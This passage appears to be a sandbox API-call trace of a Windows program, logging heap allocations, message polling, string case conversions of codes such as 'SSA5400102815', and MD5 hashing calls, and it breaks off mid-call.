RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.750] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0209.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.751] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0209.751] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.751] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0209.752] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.752] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0209.752] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.752] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.752] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.752] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.752] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0209.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.753] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.753] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.753] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0209.753] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.754] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0209.754] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.754] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.754] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.754] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0209.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0209.755] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.755] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.755] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.755] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.755] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.756] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0209.756] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.756] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0209.756] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.756] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0209.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.757] CryptCreateHash (in: hProv=0xad27a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0209.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0209.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.759] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0209.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0209.760] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.760] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.760] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.760] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.760] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.761] CryptHashData (hHash=0xaa5660, pbData=0x24b1728, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0209.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0209.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0209.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, 